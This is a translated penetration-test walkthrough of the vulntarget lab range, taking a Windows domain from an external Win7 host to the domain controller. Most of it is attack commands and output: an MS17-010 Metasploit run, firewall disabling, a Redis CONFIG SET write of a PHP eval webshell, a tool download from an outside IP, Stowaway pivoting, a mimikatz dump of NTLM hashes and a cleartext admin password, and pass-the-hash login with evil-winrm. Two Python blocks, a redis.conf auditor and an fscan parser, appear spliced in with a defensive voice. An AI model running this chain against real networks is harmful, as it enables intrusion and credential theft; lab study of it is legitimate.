192.168.52.132 is the external target IP.

Scan it with fscan:

┌──(root㉿kali)-[~/vulntarget]
└─# ./fscan_amd64 -h 192.168.52.132 -p 1-10000

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.52.132 is alive
[*] Icmp alive hosts len is: 1
192.168.52.132:110 open
192.168.52.132:80 open
192.168.52.132:135 open
192.168.52.132:139 open
192.168.52.132:445 open
192.168.52.132:1188 open
192.168.52.132:3336 open
192.168.52.132:5357 open
192.168.52.132:8750 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo:
[*]192.168.52.132
[->]win7-PC
[->]192.168.52.132
[->]10.0.20.128
[*] WebTitle: http://192.168.52.132:8750 code:403 len:564 title:403 Forbidden
[+] 192.168.52.132 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://192.168.52.132:5357 code:503 len:326 title:Service Unavailable
[*] WebTitle: http://192.168.52.132 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.52.132 [通达OA]
[+] http://192.168.52.132 tongda-user-session-disclosure
[+] http://192.168.52.132:8750 tongda-user-session-disclosure
已完成 9/9
[*] 扫描结束,耗时: 18.303575184s

Summarising the information:
192.168.52.132: Tongda OA, vulnerable to MS17-010, hostname Win7-PC, the usual ports
10.0.20.128: internal address

Just hit it with MS17-010 directly:

search MS17
use 0
set rhosts 192.168.52.132
run


Got a session straight away; start with some information gathering.


Fix the garbled console output:
chcp 65001
netsh advfirewall set allprofiles state off  (command to turn off the firewall)

If the firewall is not turned off, neither the MSF nor the CS payload will call back.
Ethernet adapter �������� 2:

Connection-specific DNS Suffix . : localdomain
Link-local IPv6 Address . . . . . : fe80::55ef:46ff:3f4:a6b3%13
IPv4 Address. . . . . . . . . . . : 10.0.20.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Ethernet adapter ��������:

Connection-specific DNS Suffix . : localdomain
Link-local IPv6 Address . . . . . : fe80::1c54:a862:b6a5:1f6c%11
IPv4 Address. . . . . . . . . . . : 192.168.52.132

Information collected:

192.168.52.132  external address
10.0.20.128  internal address

Upload fscan to scan the internal network, and set up a proxy.

wget http://101.42.39.110:3389/fscan64.exe

Here I used msf's upload module to upload fscan64.exe:

upload fscan64.exe C:\\
C:\>fscan64.exe -h 10.0.20.0/24 -p 1-10000
fscan64.exe -h 10.0.20.0/24 -p 1-10000

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 10.0.20.128 is alive
(icmp) Target 10.0.20.130 is alive
[*] Icmp alive hosts len is: 2
10.0.20.130:80 open
10.0.20.128:80 open
10.0.20.128:110 open
10.0.20.128:135 open
10.0.20.130:139 open
10.0.20.128:139 open
10.0.20.130:135 open
10.0.20.128:445 open
10.0.20.130:445 open
10.0.20.128:1188 open
10.0.20.128:3336 open
10.0.20.128:5357 open
10.0.20.130:5985 open
10.0.20.130:6379 open
10.0.20.128:8750 open
[*] alive ports len is: 15
start vulscan
[+] 10.0.20.128 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]10.0.20.128
[->]win7-PC
[->]192.168.52.132
[->]10.0.20.128
[*] WebTitle: http://10.0.20.128:8750 code:403 len:564 title:403 Forbidden
[*] WebTitle: http://10.0.20.128 code:200 len:10065 title:通达OA网络智能办公系统
[*] NetInfo:
[*]10.0.20.130
[->]win2016
[->]10.0.10.111
[->]10.0.20.130
[+] Redis:10.0.20.130:6379 unauthorized file:C:\Program Files\Redis/dump.rdb
[*] WebTitle: http://10.0.20.130 code:200 len:11 title:None
[+] InfoScan:http://10.0.20.128 [通达OA]
[*] WebTitle: http://10.0.20.128:5357 code:503 len:326 title:Service Unavailable
[*] NetBios: 10.0.20.130 win2016.vulntarget.com Windows Server 2016 Datacenter 14393
[*] WebTitle: http://10.0.20.130:5985 code:404 len:315 title:Not Found
[+] http://10.0.20.128 tongda-user-session-disclosure
[+] http://10.0.20.128:8750 tongda-user-session-disclosure
[+] http://10.0.20.128:8750 poc-yaml-tongda-oa-v11.9-api.ali.php-fileupload
已完成 15/15
[*] 扫描结束,耗时: 56.0155853s

Summarising the information: there are only two IPs in total.

10.0.20.128
10.0.20.130: this is a machine in the domain; ports 5985 and 6379; win2016.vulntarget.com
Domain vulntarget.com; port 6379 has unauthenticated access

Network addresses of this Win2016 machine:

10.0.20.130
10.0.10.111

Set up a proxy with Stowaway:

upload agent.exe C:\\


Then brute-force the directories and find a phpinfo.php file.


Find the web root; since Redis has no authentication, we can just write a shell directly.

config set dir "C:/phpStudy/PHPTutorial/WWW/"

config set dbfilename 1.php

set 1 "<?php @eval($_POST['1']);?>"

save
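The four commands above work only because the Redis on 10.0.20.130 lets an unauthenticated client call CONFIG SET and SAVE. From the defender's side the fix is in redis.conf. The following Python is an added example, not part of this write-up or of Redis; it parses a redis.conf and reports the settings that make this file-write abuse possible. The lab's real redis.conf is not on the page, so both configurations below are constructed (one mirroring the lab's unauthenticated behaviour, one hardened), and the requirepass value is a placeholder.

```python
"""Audit a redis.conf for the settings that allow the CONFIG SET dir/dbfilename
file-write abuse.  Added example; both configs are constructed, not the lab's."""

from typing import Dict, List, Set

# Constructed: behaves like the lab's Redis (reachable with no authentication).
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir "C:/Program Files/Redis"
"""

# Constructed: the same service with the usual hardening applied.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass "REPLACE_WITH_LONG_RANDOM_SECRET"   # placeholder, not a real password
rename-command CONFIG ""
rename-command SAVE ""
rename-command BGSAVE ""
dir /var/lib/redis
"""


def parse_conf(text: str) -> Dict[str, List[List[str]]]:
    """Parse redis.conf into {directive: [argument lists]}.  A directive such as
    rename-command may appear several times, hence a list of argument lists."""
    parsed: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        directive, args = parts[0].lower(), [a.strip('"') for a in parts[1:]]
        parsed.setdefault(directive, []).append(args)
    return parsed


def disabled_commands(conf: Dict[str, List[List[str]]]) -> Set[str]:
    """Commands switched off with `rename-command <CMD> ""`."""
    return {args[0].upper() for args in conf.get("rename-command", [])
            if len(args) == 2 and args[1] == ""}


def audit_redis_conf(text: str) -> List[str]:
    """Return one finding per weak setting; an empty list means nothing flagged."""
    conf = parse_conf(text)
    findings: List[str] = []
    if "requirepass" not in conf:
        findings.append("no requirepass: any client that reaches the port is fully trusted")
    binds = conf.get("bind", [[]])[-1]            # no bind line = all interfaces
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind exposes the service on all interfaces")
    mode = conf.get("protected-mode", [["yes"]])[-1]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode no: the no-password safety net is disabled")
    off = disabled_commands(conf)
    if "CONFIG" not in off:
        findings.append("CONFIG is callable: dir/dbfilename can be repointed at the web root")
    if not {"SAVE", "BGSAVE"} <= off:
        findings.append("SAVE/BGSAVE are callable: an attacker-chosen RDB can be flushed to disk")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit_redis_conf(conf) or 'no findings'}")
```

rename-command is the classic hardening; on Redis 6 and later, ACLs that deny CONFIG and SAVE to the application user do the same job with less breakage for admin tooling. The fscan line `[+] Redis:10.0.20.130:6379 unauthorized` above is exactly the first finding this audit reports.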


Written successfully; now connect with AntSword (蚁剑).


Upload fscan to scan the internal network:

   IPv4 地址 . . . . . . . . . . . . : 10.0.20.130
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
以太网适配器 Ethernet1:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::a195:ff2a:a6da:221c%12
IPv4 地址 . . . . . . . . . . . . : 10.0.10.111

But the AntSword terminal is too clunky and fscan won't run from it, so switch to Viper.


Session established; start scanning the internal network:

fscan64.exe -h 10.0.10.0/24 -p 1-10000


C:\phpStudy\PHPTutorial\WWW>type result.txt
type result.txt
10.0.10.110:53 open
10.0.10.110:88 open
10.0.10.111:80 open
10.0.10.110:139 open
10.0.10.110:135 open
10.0.10.111:135 open
10.0.10.111:139 open
10.0.10.110:389 open
10.0.10.110:445 open
10.0.10.111:445 open
10.0.10.110:464 open
10.0.10.110:593 open
10.0.10.110:636 open
10.0.10.110:3268 open
10.0.10.110:3269 open
10.0.10.111:5985 open
10.0.10.110:5985 open
10.0.10.111:6379 open
10.0.10.110:9389 open
[+] Redis:10.0.10.111:6379 unauthorized file:C:\phpStudy\PHPTutorial\WWW/1.php
[*] WebTitle: http://10.0.10.111 code:200 len:11 title:None
[*] NetBios: 10.0.10.110 [+]DC VULNTARGET\WIN2019
[*] WebTitle: http://10.0.10.111:5985 code:404 len:315 title:Not Found
[*] NetInfo:
[*]10.0.10.110
[->]win2019
[->]10.0.10.110
[*] WebTitle: http://10.0.10.110:5985 code:404 len:315 title:Not Found
10.0.10.110:135 open
10.0.10.111:135 open
10.0.10.110:139 open
10.0.10.110:88 open
10.0.10.111:80 open
10.0.10.111:139 open
10.0.10.110:53 open
10.0.10.110:389 open
10.0.10.110:445 open
10.0.10.111:445 open
10.0.10.110:464 open
10.0.10.110:593 open
10.0.10.110:636 open
10.0.10.110:3268 open
10.0.10.110:3269 open
10.0.10.111:5985 open
10.0.10.110:5985 open
10.0.10.111:6379 open
10.0.10.110:9389 open
[+] Redis:10.0.10.111:6379 unauthorized file:C:\phpStudy\PHPTutorial\WWW/1.php
[*] WebTitle: http://10.0.10.111 code:200 len:11 title:None
[*] WebTitle: http://10.0.10.111:5985 code:404 len:315 title:Not Found
[*] NetInfo:
[*]10.0.10.110
[->]win2019
[->]10.0.10.110
[*] NetBios: 10.0.10.110 [+]DC VULNTARGET\WIN2019
[*] WebTitle: http://10.0.10.110:5985 code:404 len:315 title:Not Found

Found the domain controller.

10.0.10.110 DC VULNTARGET\WIN2019    port 5985 open: the WinRM service
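Each of the three "summarise the information" steps in this write-up was done by hand from fscan's text output. The Python below is an added example, not part of the original post or of fscan; it parses that output format (the line shapes are taken from the three scans on this page; the sample is a constructed excerpt of them) into a per-host inventory and pulls out what a defender reviewing the same scan would want first: dual-homed hosts that bridge two segments, services answering without authentication, and the domain controller.

```python
"""Parse fscan 1.8.x text output into a per-host inventory.  Added example; the
sample is a constructed excerpt modelled on the scans in this write-up."""

import re
from collections import defaultdict

# Constructed sample in fscan's output format (excerpt of the 10.0.20.0/24 and
# 10.0.10.0/24 scans above).
SAMPLE = r"""
(icmp) Target 10.0.20.128 is alive
(icmp) Target 10.0.20.130 is alive
[*] Icmp alive hosts len is: 2
10.0.20.130:80 open
10.0.20.128:445 open
10.0.20.130:6379 open
10.0.20.130:5985 open
[*] alive ports len is: 4
start vulscan
[+] 10.0.20.128 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]10.0.20.128
   [->]win7-PC
   [->]192.168.52.132
   [->]10.0.20.128
[*] NetInfo:
[*]10.0.20.130
   [->]win2016
   [->]10.0.10.111
   [->]10.0.20.130
[+] Redis:10.0.20.130:6379 unauthorized file:C:\Program Files\Redis/dump.rdb
[*] WebTitle: http://10.0.20.130 code:200 len:11 title:None
[*] NetBios: 10.0.20.130 win2016.vulntarget.com Windows Server 2016 Datacenter 14393
[*] NetBios: 10.0.10.110 [+]DC VULNTARGET\WIN2019
[+] http://10.0.20.128 tongda-user-session-disclosure
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
RE_ALIVE = re.compile(rf"^\(icmp\) Target {IP} is alive$")
RE_PORT = re.compile(rf"^{IP}:(\d+) open$")
RE_NI_HOST = re.compile(rf"^\[\*\]{IP}$")                 # first line of a NetInfo block
RE_NI_ITEM = re.compile(r"^\[->\](\S+)$")                 # hostname or address under it
RE_HOSTVULN = re.compile(rf"^\[\+\] {IP} (.+)$")          # e.g. MS17-010
RE_SERVICE = re.compile(rf"^\[\+\] (\w+):{IP}:(\d+) (.+)$")  # e.g. Redis ... unauthorized
RE_WEBVULN = re.compile(rf"^\[\+\] https?://{IP}(?::\d+)? (\S+)$")
RE_WEB = re.compile(rf"^\[\*\] WebTitle: https?://{IP}(?::(\d+))? code:(\d+) len:\d+ title:(.*)$")
RE_NETBIOS = re.compile(rf"^\[\*\] NetBios: {IP} (.+)$")


def new_host():
    return {"ports": set(), "names": set(), "addrs": set(), "vulns": [],
            "web": {}, "netbios": None, "is_dc": False}


def parse_fscan(text):
    """Return {ip: host record} built from fscan's text output."""
    hosts = defaultdict(new_host)
    current = None                       # host whose NetInfo block we are inside
    for raw in text.splitlines():
        line = raw.strip()
        if m := RE_NI_HOST.match(line):
            current = m[1]
            _ = hosts[current]           # create the entry even with no open ports
            continue
        if m := RE_NI_ITEM.match(line):
            if current is not None:
                bucket = "addrs" if re.fullmatch(IP, m[1]) else "names"
                hosts[current][bucket].add(m[1])
            continue
        current = None                   # any other line ends the NetInfo block
        if m := RE_ALIVE.match(line):
            _ = hosts[m[1]]
        elif m := RE_PORT.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := RE_SERVICE.match(line):
            hosts[m[2]]["vulns"].append(f"{m[1]}:{m[3]} {m[4]}")
        elif m := RE_HOSTVULN.match(line):
            hosts[m[1]]["vulns"].append(m[2])
        elif m := RE_WEBVULN.match(line):
            hosts[m[1]]["vulns"].append(m[2])
        elif m := RE_WEB.match(line):
            hosts[m[1]]["web"][int(m[2] or 80)] = (int(m[3]), m[4])
        elif m := RE_NETBIOS.match(line):
            hosts[m[1]]["netbios"] = m[2]
            hosts[m[1]]["is_dc"] = "[+]DC" in m[2]
    return dict(hosts)


def pivot_candidates(hosts):
    """Dual-homed hosts (NetInfo lists more than one address): the boxes that
    bridge one segment to the next, which is what this write-up pivots through."""
    return sorted(ip for ip, h in hosts.items() if len(h["addrs"]) > 1)


def domain_controllers(hosts):
    return sorted(ip for ip, h in hosts.items() if h["is_dc"])


def unauthenticated_services(hosts):
    return sorted((ip, v) for ip, h in hosts.items()
                  for v in h["vulns"] if "unauthorized" in v)


if __name__ == "__main__":
    inv = parse_fscan(SAMPLE)
    for ip in sorted(inv):
        h = inv[ip]
        print(ip, sorted(h["ports"]), sorted(h["names"]), sorted(h["addrs"]), h["vulns"])
    print("dual-homed:", pivot_candidates(inv))
    print("domain controllers:", domain_controllers(inv))
    print("unauthenticated:", unauthenticated_services(inv))
```

Run on the real scans above, the dual-homed list is exactly win7-PC (192.168.52.132 / 10.0.20.128) and win2016 (10.0.20.130 / 10.0.10.111), which is the path the whole intrusion follows; a blue team that inventories those bridging hosts and the unauthenticated Redis from its own scan sees the same route before an attacker does.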

Gather information on the domain-joined Win2016 machine and look for a path to the domain controller.

Run SharpHound: upload it and run it:

SharpHound.exe --CollectionMethods All --Domain vulntarget.com --ExcludeDCs


This is the key point: the domain admin has logged on to this Win2016 machine, leaving credentials behind.

So we just run mimikatz's logonpasswords:

Authentication Id : 0 ; 329364 (00000000:00050694)
Session : Interactive from 1
User Name : win2016
Domain : VULNTARGET
Logon Server : WIN2019
Logon Time : 2023/11/11 22:30:17
SID : S-1-5-21-3795598892-1521228294-2653055093-1601
msv :
[00000005] Primary
* Username : win2016
* Domain : VULNTARGET
* NTLM : dfc8d2bfa540a0a6e2248a82322e654e
* SHA1 : cfa10f59337120a5ea6882b11c1c9f451f5f4ea6
* DPAPI : 27bd7cc4802079a6e008ed2d917c4323
tspkg :
wdigest :
* Username : win2016
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : win2016
* Domain : VULNTARGET.COM
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 71684 (00000000:00011804)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID : S-1-5-90-0-1
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : e0cd419213811fd910ca6c3c42d764e7
* SHA1 : cd721f807e68ce07a4d0fe80b9356e93986d5ef1
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : vulntarget.com
* Password : NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ
ssp :
credman :

Authentication Id : 0 ; 71573 (00000000:00011795)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID : S-1-5-90-0-1
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : 1ee53d0627d3a9c940d6579e3ea1d158
* SHA1 : 668e4f390b4fa54225f4a12106fbceab3056f83c
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : vulntarget.com
* Password : 27 7d f9 fa 4a f9 61 25 60 4e 75 42 f7 d9 c6 a0 60 c7 f1 eb 48 b3 73 bf 64 0e dd 5b 92 46 f1 2a cb 7d 19 a4 38 19 aa fb 8a a7 56 ca 40 fb 07 3b f3 c7 d4 ca b7 f3 32 49 56 92 69 78 a0 f4 66 5b 8a 40 46 9e ac 7e dc a7 18 85 68 68 65 d1 b3 1a b3 8b 76 e8 c8 ec 18 58 78 86 10 0e ae 1d 2f b5 ac 9c 29 2c c9 6e d6 eb f3 70 91 fd f4 12 11 e0 8d 48 e4 89 20 73 f4 c0 ae d3 d0 f1 45 e0 be e3 39 6a 8f 7e a4 08 4c a7 41 3d ef 23 ad 19 f4 c1 21 b1 9e 81 39 99 33 d3 8f 83 d6 49 02 59 f7 b9 6d 63 bb 2e 50 be 8f 4e f4 37 7a fa 13 95 93 d6 80 96 c0 d1 7b c6 2c 90 ca 1e 0a da 42 8b 3e 92 c7 65 85 45 41 a4 b6 76 21 35 e2 96 94 a4 07 28 c3 49 d9 31 05 24 28 07 de 8c 64 fa 8d 93 d3 ed ec 4c 75 e5 e1 05 bc 6f 6b 41 ef ed d9 f2 43 a4
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN2016$
Domain : VULNTARGET
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID : S-1-5-20
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : 1ee53d0627d3a9c940d6579e3ea1d158
* SHA1 : 668e4f390b4fa54225f4a12106fbceab3056f83c
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : win2016$
* Domain : VULNTARGET.COM
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 41061 (00000000:0000a065)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID :
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : 1ee53d0627d3a9c940d6579e3ea1d158
* SHA1 : 668e4f390b4fa54225f4a12106fbceab3056f83c
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 548857 (00000000:00085ff9)
Session : CachedInteractive from 1
User Name : Administrator
Domain : VULNTARGET
Logon Server : WIN2019
Logon Time : 2023/11/11 22:31:21
SID : S-1-5-21-3795598892-1521228294-2653055093-500
msv :
[00000005] Primary
* Username : Administrator
* Domain : VULNTARGET
* NTLM : c7c654da31ce51cbeecfef99e637be15
* SHA1 : 20045722851488e55f32110eb0a5222ba793fe2f
* DPAPI : 4df31630e621c2278c303c0940d878ff
tspkg :
wdigest :
* Username : Administrator
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : Administrator
* Domain : VULNTARGET.COM
* Password : Admin@666
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN2016$
Domain : VULNTARGET
Logon Server : (null)
Logon Time : 2023/11/11 22:29:13
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : win2016$
* Domain : VULNTARGET.COM
* Password : (null)
ssp :
credman :

Then find the domain admin's hash:

[00000005] Primary
* Username : Administrator
* Domain : VULNTARGET
* NTLM : c7c654da31ce51cbeecfef99e637be15
* SHA1 : 20045722851488e55f32110eb0a5222ba793fe2f
* DPAPI : 4df31630e621c2278c303c0940d878ff

Because the domain controller is on the 10 segment, a second-hop proxy is needed.

https://www.freebuf.com/sectool/359841.html (Stowaway)

Open another port on the Win7 machine.


Then connect to that port from the Win2016 machine:

agent.exe -c 10.0.20.128:1235


Then add another rule to Proxifier.


Add this entry to the proxychains configuration file as well.


Since we have the domain admin's hash, we can just log in with evil-winrm:

proxychains evil-winrm -i 10.0.10.110 -u Administrator -H "c7c654da31ce51cbeecfef99e637be15"


Taken.

Finally, how to enable port 3389 when RDP is not enabled:

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

You only have the permissions for this once the domain controller has been taken.

(I didn't get this to work; keeping it here as it may be useful later.)


It errors out at the second step.

Command to turn off the firewall:

netsh advfirewall set allprofiles state off

The new thing learned here is the second-hop proxy.


Viper can also be brought online through the second-hop proxy, but note that the firewall has to be turned off:

netsh advfirewall set allprofiles state off
